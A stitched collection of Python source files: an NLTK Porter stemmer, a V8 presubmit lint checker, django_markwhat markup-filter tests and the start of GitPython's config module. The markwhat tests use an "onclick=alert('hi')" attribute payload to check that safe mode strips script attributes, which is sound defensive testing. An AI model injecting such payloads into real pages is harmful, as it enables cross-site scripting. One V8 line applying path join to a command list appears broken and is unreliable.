algorithm. See the source code of this module for more
information.
The Porter Stemmer requires that all tokens have string types.
"""
# The main part of the stemming algorithm starts here.
# b is a buffer holding a word to be stemmed. The letters are in b[k0],
# b[k0+1] ... ending at b[k]. In fact k0 = 0 in this demo program. k is
# readjusted downwards as the stemming progresses. Zero termination is
# not in fact used in the algorithm.
# Note that only lower case sequences are stemmed. Forcing to lower case
# should be done before stem(...) is called.
def __init__(self):
self.b = "" # buffer for word to be stemmed
self.k = 0
self.k0 = 0
self.j = 0 # j is a general offset into the string
## --NEW--
## This is a table of irregular forms. It is quite short, but still
## reflects the errors actually drawn to Martin Porter's attention over
## a 20 year period!
##
## Extend it as necessary.
##
## The form of the table is:
## {
## "p1" : ["s11","s12","s13", ... ],
## "p2" : ["s21","s22","s23", ... ],
## ...
## "pn" : ["sn1","sn2","sn3", ... ]
## }
##
## String sij is mapped to paradigm form pi, and the main stemming
## process is then bypassed.
irregular_forms = {
"sky" : ["sky", "skies"],
"die" : ["dying"],
"lie" : ["lying"],
"tie" : ["tying"],
"news" : ["news"],
"inning" : ["innings", "inning"],
"outing" : ["outings", "outing"],
"canning" : ["cannings", "canning"],
"howe" : ["howe"],
# --NEW--
"proceed" : ["proceed"],
"exceed" : ["exceed"],
"succeed" : ["succeed"], # Hiranmay Ghosh
}
self.pool = {}
for key in irregular_forms:
for val in irregular_forms[key]:
self.pool[val] = key
def cons(self, i):
"""cons(i) is TRUE <=> b[i] is a consonant."""
if self.b[i] == 'a' or self.b[i] == 'e' or self.b[i] == 'i' or self.b[i] == 'o' or self.b[i] == 'u':
return 0
if self.b[i] == 'y':
if i == self.k0:
return 1
else:
return (not self.cons(i - 1))
return 1
def m(self):
"""m() measures the number of consonant sequences between k0 and j.
if c is a consonant sequence and v a vowel sequence, and <..>
indicates arbitrary presence,
<c><v> gives 0
<c>vc<v> gives 1
<c>vcvc<v> gives 2
<c>vcvcvc<v> gives 3
....
"""
n = 0
i = self.k0
while 1:
if i > self.j:
return n
if not self.cons(i):
break
i = i + 1
i = i + 1
while 1:
while 1:
if i > self.j:
return n
if self.cons(i):
break
i = i + 1
i = i + 1
n = n + 1
while 1:
if i > self.j:
return n
if not self.cons(i):
break
i = i + 1
i = i + 1
def vowelinstem(self):
"""vowelinstem() is TRUE <=> k0,...j contains a vowel"""
for i in range(self.k0, self.j + 1):
if not self.cons(i):
return 1
return 0
def doublec(self, j):
"""doublec(j) is TRUE <=> j,(j-1) contain a double consonant."""
if j < (self.k0 + 1):
return 0
if (self.b[j] != self.b[j-1]):
return 0
return self.cons(j)
def cvc(self, i):
"""cvc(i) is TRUE <=>
a) ( --NEW--) i == 1, and p[0] p[1] is vowel consonant, or
b) p[i - 2], p[i - 1], p[i] has the form consonant -
vowel - consonant and also if the second c is not w, x or y. this
is used when trying to restore an e at the end of a short word.
e.g.
cav(e), lov(e), hop(e), crim(e), but
snow, box, tray.
"""
if i == 0: return 0 # i == 0 never happens perhaps
if i == 1: return (not self.cons(0) and self.cons(1))
if not self.cons(i) or self.cons(i-1) or not self.cons(i-2): return 0
ch = self.b[i]
if ch == 'w' or ch == 'x' or ch == 'y':
return 0
return 1
def ends(self, s):
"""ends(s) is TRUE <=> k0,...k ends with the string s."""
length = len(s)
if s[length - 1] != self.b[self.k]: # tiny speed-up
return 0
if length > (self.k - self.k0 + 1):
return 0
if self.b[self.k-length+1:self.k+1] != s:
return 0
self.j = self.k - length
return 1
def setto(self, s):
"""setto(s) sets (j+1),...k to the characters in the string s, readjusting k."""
length = len(s)
self.b = self.b[:self.j+1] + s + self.b[self.j+length+1:]
self.k = self.j + length
def r(self, s):
"""r(s) is used further down."""
if self.m() > 0:
self.setto(s)
def step1ab(self):
"""step1ab() gets rid of plurals and -ed or -ing. e.g.
caresses -> caress
ponies -> poni
sties -> sti
tie -> tie (--NEW--: see below)
caress -> caress
cats -> cat
feed -> feed
agreed -> agree
disabled -> disable
matting -> mat
mating -> mate
meeting -> meet
milling -> mill
messing -> mess
meetings -> meet
"""
if self.b[self.k] == 's':
if self.ends("sses"):
self.k = self.k - 2
elif self.ends("ies"):
if self.j == 0:
self.k = self.k - 1
# this line extends the original algorithm, so that
# 'flies'->'fli' but 'dies'->'die' etc
else:
self.k = self.k - 2
elif self.b[self.k - 1] != 's':
self.k = self.k - 1
if self.ends("ied"):
if self.j == 0:
self.k = self.k - 1
else:
self.k = self.k - 2
# this line extends the original algorithm, so that
# 'spied'->'spi' but 'died'->'die' etc
elif self.ends("eed"):
if self.m() > 0:
self.k = self.k - 1
elif (self.ends("ed") or self.ends("ing")) and self.vowelinstem():
self.k = self.j
if self.ends("at"): self.setto("ate")
elif self.ends("bl"): self.setto("ble")
elif self.ends("iz"): self.setto("ize")
elif self.doublec(self.k):
self.k = self.k - 1
ch = self.b[self.k]
if ch == 'l' or ch == 's' or ch == 'z':
self.k = self.k + 1
elif (self.m() == 1 and self.cvc(self.k)):
self.setto("e")
def step1c(self):
"""step1c() turns terminal y to i when there is another vowel in the stem.
--NEW--: This has been modified from the original Porter algorithm so that y->i
is only done when y is preceded by a consonant, but not if the stem
is only a single consonant, i.e.
(*c and not c) Y -> I
So 'happy' -> 'happi', but
'enjoy' -> 'enjoy' etc
This is a much better rule. Formerly 'enjoy'->'enjoi' and 'enjoyment'->
'enjoy'. Step 1c is perhaps done too soon; but with this modification that
no longer really matters.
Also, the removal of the vowelinstem(z) condition means that 'spy', 'fly',
'try' ... stem to 'spi', 'fli', 'tri' and conflate with 'spied', 'tried',
'flies' ...
"""
if self.ends("y") and self.j > 0 and self.cons(self.k - 1):
self.b = self.b[:self.k] + 'i' + self.b[self.k+1:]
def step2(self):
"""step2() maps double suffices to single ones.
so -ization ( = -ize plus -ation) maps to -ize etc. note that the
string before the suffix must give m() > 0.
"""
if self.b[self.k - 1] == 'a':
if self.ends("ational"): self.r("ate")
elif self.ends("tional"): self.r("tion")
elif self.b[self.k - 1] == 'c':
if self.ends("enci"): self.r("ence")
elif self.ends("anci"): self.r("ance")
elif self.b[self.k - 1] == 'e':
if self.ends("izer"): self.r("ize")
elif self.b[self.k - 1] == 'l':
if self.ends("bli"): self.r("ble") # --DEPARTURE--
# To match the published algorithm, replace this phrase with
# if self.ends("abli"): self.r("able")
elif self.ends("alli"):
if self.m() > 0: # --NEW--
self.setto("al")
self.step2()
elif self.ends("fulli"): self.r("ful") # --NEW--
elif self.ends("entli"): self.r("ent")
elif self.ends("eli"): self.r("e")
elif self.ends("ousli"): self.r("ous")
elif self.b[self.k - 1] == 'o':
if self.ends("ization"): self.r("ize")
elif self.ends("ation"): self.r("ate")
elif self.ends("ator"): self.r("ate")
elif self.b[self.k - 1] == 's':
if self.ends("alism"): self.r("al")
elif self.ends("iveness"): self.r("ive")
elif self.ends("fulness"): self.r("ful")
elif self.ends("ousness"): self.r("ous")
elif self.b[self.k - 1] == 't':
if self.ends("aliti"): self.r("al")
elif self.ends("iviti"): self.r("ive")
elif self.ends("biliti"): self.r("ble")
elif self.b[self.k - 1] == 'g': # --DEPARTURE--
if self.ends("logi"):
self.j = self.j + 1 # --NEW-- (Barry Wilkins)
self.r("og")
# To match the published algorithm, delete this phrase
def step3(self):
"""step3() dels with -ic-, -full, -ness etc. similar strategy to step2."""
if self.b[self.k] == 'e':
if self.ends("icate"): self.r("ic")
elif self.ends("ative"): self.r("")
elif self.ends("alize"): self.r("al")
elif self.b[self.k] == 'i':
if self.ends("iciti"): self.r("ic")
elif self.b[self.k] == 'l':
if self.ends("ical"): self.r("ic")
elif self.ends("ful"): self.r("")
elif self.b[self.k] == 's':
if self.ends("ness"): self.r("")
def step4(self):
"""step4() takes off -ant, -ence etc., in context <c>vcvc<v>."""
if self.b[self.k - 1] == 'a':
if self.ends("al"): pass
else: return
elif self.b[self.k - 1] == 'c':
if self.ends("ance"): pass
elif self.ends("ence"): pass
else: return
elif self.b[self.k - 1] == 'e':
if self.ends("er"): pass
else: return
elif self.b[self.k - 1] == 'i':
if self.ends("ic"): pass
else: return
elif self.b[self.k - 1] == 'l':
if self.ends("able"): pass
elif self.ends("ible"): pass
else: return
elif self.b[self.k - 1] == 'n':
if self.ends("ant"): pass
elif self.ends("ement"): pass
elif self.ends("ment"): pass
elif self.ends("ent"): pass
else: return
elif self.b[self.k - 1] == 'o':
if self.ends("ion") and (self.b[self.j] == 's' or self.b[self.j] == 't'): pass
elif self.ends("ou"): pass
# takes care of -ous
else: return
elif self.b[self.k - 1] == 's':
if self.ends("ism"): pass
else: return
elif self.b[self.k - 1] == 't':
if self.ends("ate"): pass
elif self.ends("iti"): pass
else: return
elif self.b[self.k - 1] == 'u':
if self.ends("ous"): pass
else: return
elif self.b[self.k - 1] == 'v':
if self.ends("ive"): pass
else: return
elif self.b[self.k - 1] == 'z':
if self.ends("ize"): pass
else: return
else:
return
if self.m() > 1:
self.k = self.j
def step5(self):
"""step5() removes a final -e if m() > 1, and changes -ll to -l if
m() > 1.
"""
self.j = self.k
if self.b[self.k] == 'e':
a = self.m()
if a > 1 or (a == 1 and not self.cvc(self.k-1)):
self.k = self.k - 1
if self.b[self.k] == 'l' and self.doublec(self.k) and self.m() > 1:
self.k = self.k -1
def stem_word(self, p, i=0, j=None):
"""In stem(p,i,j), p is a char pointer, and the string to be stemmed
is from p[i] to p[j] inclusive. Typically i is zero and j is the
offset to the last character of a string, (p[j+1] == '\0'). The
stemmer adjusts the characters p[i] ... p[j] and returns the new
end-point of the string, k. Stemming never increases word length, so
i <= k <= j. To turn the stemmer into a module, declare 'stem' as
extern, and delete the remainder of this file.
"""
## --NLTK--
## Don't print results as we go (commented out the next line)
#print p[i:j+1]
if j is None:
j = len(p) - 1
# copy the parameters into statics
self.b = p
self.k = j
self.k0 = i
if self.b[self.k0:self.k+1] in self.pool:
return self.pool[self.b[self.k0:self.k+1]]
if self.k <= self.k0 + 1:
return self.b # --DEPARTURE--
# With this line, strings of length 1 or 2 don't go through the
# stemming process, although no mention is made of this in the
# published algorithm. Remove the line to match the published
# algorithm.
self.step1ab()
self.step1c()
self.step2()
self.step3()
self.step4()
self.step5()
return self.b[self.k0:self.k+1]
def adjust_case(self, word, stem):
lower = word.lower()
ret = ""
for x in xrange(len(stem)):
if lower[x] == stem[x]:
ret += word[x]
else:
ret += stem[x]
return ret
## --NLTK--
## Don't use this procedure; we want to work with individual
## tokens, instead. (commented out the following procedure)
#def stem(self, text):
# parts = re.split("(\W+)", text)
# numWords = (len(parts) + 1)/2
#
# ret = ""
# for i in xrange(numWords):
# word = parts[2 * i]
# separator = ""
# if ((2 * i) + 1) < len(parts):
# separator = parts[(2 * i) + 1]
#
# stem = self.stem_word(string.lower(word), 0, len(word) - 1)
# ret = ret + self.adjust_case(word, stem)
# ret = ret + separator
# return ret
## --NLTK--
## Define a stem() method that implements the StemmerI interface.
def stem(self, word):
stem = self.stem_word(word.lower(), 0, len(word) - 1)
return self.adjust_case(word, stem)
## --NLTK--
## Add a string representation function
def __repr__(self):
return '<PorterStemmer>'
## --NLTK--
## This test procedure isn't applicable.
#if __name__ == '__main__':
# p = PorterStemmer()
# if len(sys.argv) > 1:
# for f in sys.argv[1:]:
# infile = open(f, 'r')
# while 1:
# w = infile.readline()
# if w == '':
# break
# w = w[:-1]
# print p.stem(w)
##--NLTK--
## Added a demo() function
def demo():
"""
A demonstration of the porter stemmer on a sample from
the Penn Treebank corpus.
"""
from nltk.corpus import treebank
from nltk import stem
stemmer = stem.PorterStemmer()
orig = []
stemmed = []
for item in treebank.files()[:3]:
for (word, tag) in treebank.tagged_words(item):
orig.append(word)
stemmed.append(stemmer.stem(word))
# Convert the results to a string, and word-wrap them.
results = ' '.join(stemmed)
results = re.sub(r"(.{,70})\s", r'\1\n', results+' ').rstrip()
# Convert the original to a string, and word wrap it.
original = ' '.join(orig)
original = re.sub(r"(.{,70})\s", r'\1\n', original+' ').rstrip()
# Print the results.
print('-Original-'.center(70).replace(' ', '*').replace('-', ' '))
print(original)
print('-Results-'.center(70).replace(' ', '*').replace('-', ' '))
print(results)
print('*'*70)
##--NLTK--
if __name__ == "__main__":
import doctest
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
|
#!/usr/bin/env python
#
# Copyright 2012 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
try:
import hashlib
md5er = hashlib.md5
except ImportError, e:
import md5
md5er = md5.new
import optparse
import os
from os.path import abspath, join, dirname, basename, exists
import pickle
import re
import sys
import subprocess
import multiprocessing
from subprocess import PIPE
# Disabled LINT rules and reason.
# build/include_what_you_use: Started giving false positives for variables
# named "string" and "map" assuming that you needed to include STL headers.
ENABLED_LINT_RULES = """
build/class
build/deprecated
build/endif_comment
build/forward_decl
build/include_alpha
build/include_order
build/printf_format
build/storage_class
legal/copyright
readability/boost
readability/braces
readability/casting
readability/constructors
readability/fn_size
readability/function
readability/multiline_comment
readability/multiline_string
readability/streams
readability/todo
readability/utf8
runtime/arrays
runtime/casting
runtime/deprecated_fn
runtime/explicit
runtime/int
runtime/memset
runtime/mutex
runtime/nonconf
runtime/printf
runtime/printf_format
runtime/rtti
runtime/sizeof
runtime/string
runtime/virtual
runtime/vlog
whitespace/blank_line
whitespace/braces
whitespace/comma
whitespace/comments
whitespace/ending_newline
whitespace/indent
whitespace/labels
whitespace/line_length
whitespace/newline
whitespace/operators
whitespace/parens
whitespace/tab
whitespace/todo
""".split()
# TODO(bmeurer): Fix and re-enable readability/check
LINT_OUTPUT_PATTERN = re.compile(r'^.+[:(]\d+[:)]|^Done processing')
def CppLintWorker(command):
try:
process = subprocess.Popen(command, stderr=subprocess.PIPE)
process.wait()
out_lines = ""
error_count = -1
while True:
out_line = process.stderr.readline()
if out_line == '' and process.poll() != None:
if error_count == -1:
print "Failed to process %s" % command.pop()
return 1
break
m = LINT_OUTPUT_PATTERN.match(out_line)
if m:
out_lines += out_line
error_count += 1
sys.stdout.write(out_lines)
return error_count
except KeyboardInterrupt:
process.kill()
except:
print('Error running cpplint.py. Please make sure you have depot_tools' +
' in your $PATH. Lint check skipped.')
process.kill()
class FileContentsCache(object):
def __init__(self, sums_file_name):
self.sums = {}
self.sums_file_name = sums_file_name
def Load(self):
try:
sums_file = None
try:
sums_file = open(self.sums_file_name, 'r')
self.sums = pickle.load(sums_file)
except:
# Cannot parse pickle for any reason. Not much we can do about it.
pass
finally:
if sums_file:
sums_file.close()
def Save(self):
try:
sums_file = open(self.sums_file_name, 'w')
pickle.dump(self.sums, sums_file)
except:
# Failed to write pickle. Try to clean-up behind us.
if sums_file:
sums_file.close()
try:
os.unlink(self.sums_file_name)
except:
pass
finally:
sums_file.close()
def FilterUnchangedFiles(self, files):
changed_or_new = []
for file in files:
try:
handle = open(file, "r")
file_sum = md5er(handle.read()).digest()
if not file in self.sums or self.sums[file] != file_sum:
changed_or_new.append(file)
self.sums[file] = file_sum
finally:
handle.close()
return changed_or_new
def RemoveFile(self, file):
if file in self.sums:
self.sums.pop(file)
class SourceFileProcessor(object):
"""
Utility class that can run through a directory structure, find all relevant
files and invoke a custom check on the files.
"""
def Run(self, path):
all_files = []
for file in self.GetPathsToSearch():
all_files += self.FindFilesIn(join(path, file))
if not self.ProcessFiles(all_files, path):
return False
return True
def IgnoreDir(self, name):
return (name.startswith('.') or
name in ('buildtools', 'data', 'gmock', 'gtest', 'kraken',
'octane', 'sunspider'))
def IgnoreFile(self, name):
return name.startswith('.')
def FindFilesIn(self, path):
result = []
for (root, dirs, files) in os.walk(path):
for ignored in [x for x in dirs if self.IgnoreDir(x)]:
dirs.remove(ignored)
for file in files:
if not self.IgnoreFile(file) and self.IsRelevant(file):
result.append(join(root, file))
return result
class CppLintProcessor(SourceFileProcessor):
"""
Lint files to check that they follow the google code style.
"""
def IsRelevant(self, name):
return name.endswith('.cc') or name.endswith('.h')
def IgnoreDir(self, name):
return (super(CppLintProcessor, self).IgnoreDir(name)
or (name == 'third_party'))
IGNORE_LINT = ['flag-definitions.h']
def IgnoreFile(self, name):
return (super(CppLintProcessor, self).IgnoreFile(name)
or (name in CppLintProcessor.IGNORE_LINT))
def GetPathsToSearch(self):
return ['src', 'include', 'samples',
join('test', 'base-unittests'),
join('test', 'cctest'),
join('test', 'compiler-unittests')]
def GetCpplintScript(self, prio_path):
for path in [prio_path] + os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
cpplint = os.path.join(path, "cpplint.py")
if os.path.isfile(cpplint):
return cpplint
return None
def ProcessFiles(self, files, path):
good_files_cache = FileContentsCache('.cpplint-cache')
good_files_cache.Load()
files = good_files_cache.FilterUnchangedFiles(files)
if len(files) == 0:
print 'No changes in files detected. Skipping cpplint check.'
return True
filt = '-,' + ",".join(['+' + n for n in ENABLED_LINT_RULES])
command = [sys.executable, 'cpplint.py', '--filter', filt]
cpplint = self.GetCpplintScript(join(path, "tools"))
if cpplint is None:
print('Could not find cpplint.py. Make sure '
'depot_tools is installed and in the path.')
sys.exit(1)
command = [sys.executable, cpplint, '--filter', filt]
commands = join([command + [file] for file in files])
count = multiprocessing.cpu_count()
pool = multiprocessing.Pool(count)
try:
results = pool.map_async(CppLintWorker, commands).get(999999)
except KeyboardInterrupt:
print "\nCaught KeyboardInterrupt, terminating workers."
sys.exit(1)
for i in range(len(files)):
if results[i] > 0:
good_files_cache.RemoveFile(files[i])
total_errors = sum(results)
print "Total errors found: %d" % total_errors
good_files_cache.Save()
return total_errors == 0
COPYRIGHT_HEADER_PATTERN = re.compile(
r'Copyright [\d-]*20[0-1][0-9] the V8 project authors. All rights reserved.')
class SourceProcessor(SourceFileProcessor):
"""
Check that all files include a copyright notice and no trailing whitespaces.
"""
RELEVANT_EXTENSIONS = ['.js', '.cc', '.h', '.py', '.c',
'.status', '.gyp', '.gypi']
# Overwriting the one in the parent class.
def FindFilesIn(self, path):
if os.path.exists(path+'/.git'):
output = subprocess.Popen('git ls-files --full-name',
stdout=PIPE, cwd=path, shell=True)
result = []
for file in output.stdout.read().split():
for dir_part in os.path.dirname(file).replace(os.sep, '/').split('/'):
if self.IgnoreDir(dir_part):
break
else:
if (self.IsRelevant(file) and os.path.exists(file)
and not self.IgnoreFile(file)):
result.append(join(path, file))
if output.wait() == 0:
return result
return super(SourceProcessor, self).FindFilesIn(path)
def IsRelevant(self, name):
for ext in SourceProcessor.RELEVANT_EXTENSIONS:
if name.endswith(ext):
return True
return False
def GetPathsToSearch(self):
return ['.']
def IgnoreDir(self, name):
return (super(SourceProcessor, self).IgnoreDir(name) or
name in ('third_party', 'gyp', 'out', 'obj', 'DerivedSources'))
IGNORE_COPYRIGHTS = ['cpplint.py',
'daemon.py',
'earley-boyer.js',
'raytrace.js',
'crypto.js',
'libraries.cc',
'libraries-empty.cc',
'jsmin.py',
'regexp-pcre.js',
'gnuplot-4.6.3-emscripten.js']
IGNORE_TABS = IGNORE_COPYRIGHTS + ['unicode-test.js', 'html-comments.js']
def EndOfDeclaration(self, line):
return line == "}" or line == "};"
def StartOfDeclaration(self, line):
return line.find("//") == 0 or \
line.find("/*") == 0 or \
line.find(") {") != -1
def ProcessContents(self, name, contents):
result = True
base = basename(name)
if not base in SourceProcessor.IGNORE_TABS:
if '\t' in contents:
print "%s contains tabs" % name
result = False
if not base in SourceProcessor.IGNORE_COPYRIGHTS:
if not COPYRIGHT_HEADER_PATTERN.search(contents):
print "%s is missing a correct copyright header." % name
result = False
if ' \n' in contents or contents.endswith(' '):
line = 0
lines = []
parts = contents.split(' \n')
if not contents.endswith(' '):
parts.pop()
for part in parts:
line += part.count('\n') + 1
lines.append(str(line))
linenumbers = ', '.join(lines)
if len(lines) > 1:
print "%s has trailing whitespaces in lines %s." % (name, linenumbers)
else:
print "%s has trailing whitespaces in line %s." % (name, linenumbers)
result = False
if not contents.endswith('\n') or contents.endswith('\n\n'):
print "%s does not end with a single new line." % name
result = False
# Check two empty lines between declarations.
if name.endswith(".cc"):
line = 0
lines = []
parts = contents.split('\n')
while line < len(parts) - 2:
if self.EndOfDeclaration(parts[line]):
if self.StartOfDeclaration(parts[line + 1]):
lines.append(str(line + 1))
line += 1
elif parts[line + 1] == "" and \
self.StartOfDeclaration(parts[line + 2]):
lines.append(str(line + 1))
line += 2
line += 1
if len(lines) >= 1:
linenumbers = ', '.join(lines)
if len(lines) > 1:
print "%s does not have two empty lines between declarations " \
"in lines %s." % (name, linenumbers)
else:
print "%s does not have two empty lines between declarations " \
"in line %s." % (name, linenumbers)
result = False
return result
def ProcessFiles(self, files, path):
success = True
violations = 0
for file in files:
try:
handle = open(file)
contents = handle.read()
if not self.ProcessContents(file, contents):
success = False
violations += 1
finally:
handle.close()
print "Total violating files: %s" % violations
return success
def CheckGeneratedRuntimeTests(workspace):
code = subprocess.call(
[sys.executable, join(workspace, "tools", "generate-runtime-tests.py"),
"check"])
return code == 0
def CheckExternalReferenceRegistration(workspace):
code = subprocess.call(
[sys.executable, join(workspace, "tools", "external-reference-check.py")])
return code == 0
def GetOptions():
result = optparse.OptionParser()
result.add_option('--no-lint', help="Do not run cpplint", default=False,
action="store_true")
return result
def Main():
workspace = abspath(join(dirname(sys.argv[0]), '..'))
parser = GetOptions()
(options, args) = parser.parse_args()
success = True
print "Running C++ lint check..."
if not options.no_lint:
success = CppLintProcessor().Run(workspace) and success
print "Running copyright header, trailing whitespaces and " \
"two empty lines between declarations check..."
success = SourceProcessor().Run(workspace) and success
success = CheckGeneratedRuntimeTests(workspace) and success
success = CheckExternalReferenceRegistration(workspace) and success
if success:
return 0
else:
return 1
if __name__ == '__main__':
sys.exit(Main())
|
|
# Quick tests for the markup templatetags (django_markwhat)
import re
import unittest
from django.template import Template, Context
from django.utils.html import escape
try:
import textile
except ImportError:
textile = None
try:
import markdown
markdown_version = getattr(markdown, "version_info", 0)
except ImportError:
markdown = None
try:
import CommonMark
except ImportError:
CommonMark = None
try:
import docutils
except ImportError:
docutils = None
class Templates(unittest.TestCase):
textile_content = """Paragraph 1
Paragraph 2 with "quotes" and @code@"""
markdown_content = """Paragraph 1
## An h2"""
markdown_content_with_html_code = """Paragraph 1
## An h2
```
<video width="320" height="240" controls>
<source src="movie.mp4" type="video/mp4">
<source src="movie.ogg" type="video/ogg">
</video>
```
"""
markdown_content_with_iframe_code = """Paragraph 1
## An h2
```
<iframe src="http://example.com"></iframe>
```
"""
rest_content = """Paragraph 1
Paragraph 2 with a link_
.. _link: http://www.example.com/"""
@unittest.skipUnless(textile, 'texttile not installed')
def test_textile(self):
t = Template("{% load markup %}{{ textile_content|textile }}")
rendered = t.render(Context(
{'textile_content': self.textile_content})).strip()
self.assertEqual(rendered.replace('\t', ''), """<p>Paragraph 1</p>
<p>Paragraph 2 with “quotes” and <code>code</code></p>""")
@unittest.skipIf(textile, 'texttile is installed')
def test_no_textile(self):
t = Template("{% load markup %}{{ textile_content|textile }}")
rendered = t.render(Context(
{'textile_content': self.textile_content})).strip()
self.assertEqual(rendered, escape(self.textile_content))
@unittest.skipUnless(markdown, 'markdown not installed')
def test_markdown(self):
t = Template("{% load markup %}{{ markdown_content|markdown }}")
rendered = t.render(Context({
'markdown_content': self.markdown_content
})).strip()
pattern = re.compile("""<p>Paragraph 1\s*</p>\s*<h2>\s*An h2</h2>""")
self.assertTrue(pattern.match(rendered))
@unittest.skipUnless(markdown, 'markdown not installed')
def test_markdown_html_code(self):
t = Template("{% load markup %}{{ markdown_content|markdown }}")
rendered = t.render(Context({
'markdown_content': self.markdown_content_with_html_code
})).strip()
pattern = re.compile(
'<p>Paragraph 1\s*</p>\s*<h2>\s*An h2</h2>' +
'\s*<p><code>\s*<video width="320"'
)
self.assertTrue(pattern.match(rendered))
@unittest.skipUnless(markdown, 'markdown not installed')
def test_markdown_html_iframe_code(self):
t = Template("{% load markup %}{{ markdown_content|markdown }}")
rendered = t.render(Context({
'markdown_content': self.markdown_content_with_iframe_code
})).strip()
pattern = re.compile(
'<p>Paragraph 1\s*</p>\s*<h2>\s*An h2</h2>' +
'\s*<p><code>\s*<iframe src="http://example.com">' +
'</iframe>'
)
self.assertTrue(pattern.match(rendered))
@unittest.skipUnless(
markdown and markdown_version >= (2, 1),
'markdown >= 2.1 not installed'
)
def test_markdown_attribute_disable(self):
t = Template("{% load markup %}{{ markdown_content|markdown:'safe' }}")
markdown_content = "{@onclick=alert('hi')}some paragraph"
rendered = t.render(Context(
{'markdown_content': markdown_content})).strip()
self.assertTrue('@' in rendered)
@unittest.skipUnless(
markdown and markdown_version >= (2, 1),
'markdown >= 2.1 not installed'
)
def test_markdown_attribute_enable(self):
t = Template("{% load markup %}{{ markdown_content|markdown }}")
markdown_content = "{@onclick=alert('hi')}some paragraph"
rendered = t.render(Context(
{'markdown_content': markdown_content})).strip()
self.assertFalse('@' in rendered)
@unittest.skipIf(markdown, 'markdown is installed')
def test_no_markdown(self):
t = Template("{% load markup %}{{ markdown_content|markdown }}")
rendered = t.render(Context(
{'markdown_content': self.markdown_content})).strip()
self.assertEqual(rendered, self.markdown_content)
@unittest.skipUnless(CommonMark, 'commonmark not installed')
def test_commonmark(self):
t = Template("{% load markup %}{{ markdown_content|commonmark }}")
rendered = t.render(
Context({'markdown_content': self.markdown_content})).strip()
pattern = re.compile("""<p>Paragraph 1\s*</p>\s*<h2>\s*An h2</h2>""")
self.assertTrue(pattern.match(rendered))
@unittest.skipUnless(CommonMark, 'commonmark not installed')
def test_commonmark_html_code(self):
t = Template("{% load markup %}{{ markdown_content|commonmark }}")
rendered = t.render(Context({
'markdown_content': self.markdown_content_with_html_code
})).strip()
pattern = re.compile(
'<p>Paragraph 1\s*</p>\s*<h2>\s*An h2</h2>' +
'\s*<pre><code>\s*<video width="320"'
)
self.assertTrue(pattern.match(rendered))
@unittest.skipUnless(CommonMark, 'commonmark not installed')
def test_commonmark_html_iframe_code(self):
t = Template("{% load markup %}{{ markdown_content|commonmark }}")
rendered = t.render(Context({
'markdown_content': self.markdown_content_with_iframe_code
})).strip()
pattern = re.compile(
'<p>Paragraph 1\s*</p>\s*<h2>\s*An h2</h2>' +
'\s*<pre><code>\s*<iframe ' +
'src="http://example.com">' +
'</iframe>'
)
self.assertTrue(pattern.match(rendered))
@unittest.skipUnless(CommonMark, 'commonmark not installed')
def test_commonmark_empty_str(self):
t = Template("{% load markup %}{{ markdown_content|commonmark }}")
rendered = t.render(Context({'markdown_content': ''})).strip()
self.assertEqual(rendered, '')
@unittest.skipUnless(CommonMark, 'commonmark not installed')
def test_commonmark_none(self):
t = Template("{% load markup %}{{ markdown_content|commonmark }}")
rendered = t.render(Context({'markdown_content': None})).strip()
self.assertEqual(rendered, '<p>None</p>')
@unittest.skipUnless(docutils, 'docutils not installed')
def test_docutils(self):
t = Template("{% load markup %}{{ rest_content|restructuredtext }}")
rendered = t.render(Context({
'rest_content': self.rest_content
})).strip()
# Different versions of docutils return slightly different HTML
try:
# Docutils v0.4 and earlier
self.assertEqual(
rendered,
'<p>Paragraph 1</p>\n' +
'<p>Paragraph 2 with a <a class="reference" ' +
'href="http://www.example.com/">link</a></p>')
except AssertionError:
# Docutils from SVN (which will become 0.5)
self.assertEqual(
rendered,
'<p>Paragraph 1</p>\n' +
'<p>Paragraph 2 with a ' +
'<a class="reference external" ' +
'href="http://www.example.com/">link</a></p>')
@unittest.skipIf(docutils, 'docutils is installed')
def test_no_docutils(self):
t = Template("{% load markup %}{{ rest_content|restructuredtext }}")
rendered = t.render(
Context({'rest_content': self.rest_content})).strip()
self.assertEqual(rendered, self.rest_content)
|
|
# config.py
# Copyright (C) 2008, 2009 Michael Trier ([email protected]) and contributors
#
# This module is part of GitPython and is released under
# the BSD License: http://www.opensource.org/licenses/bsd-license.php
"""Module containing module parser implementation able to properly read and write
configuration files"""
import abc
from functools import wraps
import inspect
import logging
import os
import re
from git.compat import (
string_types,
FileType,
defenc,
force_text,
with_metaclass,
PY3
)
from git.odict import OrderedDict
from git.util import LockFile
import os.path as osp
try:
import ConfigParser as cp
except ImportError:
# PY3
import configparser as cp
__all__ = ('GitConfigParser', 'SectionConstraint')
log = logging.getLogger('git.config')
log.addHandler(logging.NullHandler())
class MetaParserBuilder(abc.ABCMeta):
"""Utlity class wrapping base-class methods into decorators that assure read-only properties"""
def __new__(cls, name, bases, clsdict):
"""
Equip all base-class methods with a needs_values decorator, and all non-const methods
with a set_dirty_and_flush_changes decorator in addition to that."""
